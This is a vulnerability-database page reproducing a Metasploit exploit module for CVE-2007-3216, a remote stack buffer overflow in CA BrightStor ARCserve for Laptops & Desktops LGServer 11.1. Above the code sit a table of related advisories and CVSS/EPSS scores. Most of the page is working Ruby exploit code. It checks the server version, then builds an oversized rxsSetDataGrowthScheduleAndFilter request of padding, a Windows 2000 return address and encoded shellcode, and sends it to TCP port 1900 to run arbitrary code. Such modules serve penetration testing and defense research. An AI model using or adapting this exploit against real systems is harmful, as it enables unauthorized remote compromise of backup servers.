CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Remote Buffer Overflow (Metasploit)

🗓️ 10 Mar 2011 00:00:00Reported by MetasploitType

CA BrightStor ARCserve for Laptops & Desktops LGServer buffer overflo

Reporter	Title	Published	Views	Family All 25
Tenable Nessus	CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities	13 Aug 201300:00	–	nessus
Circl	CVE-2007-3216	3 Nov 201000:00	–	circl
Check Point Advisories	IPS-1 Protection Update for Various Enterprise Products (enterprisesoftware Version 1)	24 Oct 200700:00	–	checkpoint_advisories
Check Point Advisories	CA ARCserve Backup for Laptops and Desktops LGServer Buffer Overflows (CVE-2007-3216)	5 Nov 200900:00	–	checkpoint_advisories
CVE	CVE-2007-3216	14 Jun 200722:00	–	cve
Cvelist	CVE-2007-3216	14 Jun 200722:00	–	cvelist
Exploit DB	CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (2)	3 Nov 201000:00	–	exploitdb
Exploit DB	CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)	4 Nov 201000:00	–	exploitdb
Metasploit	CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow	4 Nov 201022:19	–	metasploit
Metasploit	CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow	4 Nov 201001:51	–	metasploit

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
				for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),
				an attacker could overflow the buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10892 $',
			'References'     =>
				[
					[ 'CVE', '2007-3216' ],
					[ 'OSVDB', '35329' ],
					[ 'BID', '24348' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 700,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'  =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x75031dce } ],
				],
			'DisclosureDate' => 'Jun 6 2007',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(1900) ], self.class)
	end

	def check

		connect

		sock.put("0000000019rxrGetServerVersion")
		ver = sock.get_once

		disconnect

		if ( ver =~ /11.1.742/ )
				return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe

	end

	def exploit

		connect

		data = rand_text_alpha_upper(20080) + [target.ret].pack('V')
		data << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)

		sploit  = "0000025000"				# Command Length Field
		sploit << "rxsSetDataGrowthScheduleAndFilter"	# RPC Command
		sploit << "~~"					# Constant Argument Delimiter
		sploit << data

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect

	end

end

10 Mar 2011 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 210

EPSS0.64283

CA BrightStor ARCserve for Laptops &amp; Desktops LGServer - &#039;rxsSetDataGrowthScheduleAndFilter&#039; Remote Buffer Overflow (Metasploit)

CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Remote Buffer Overflow (Metasploit)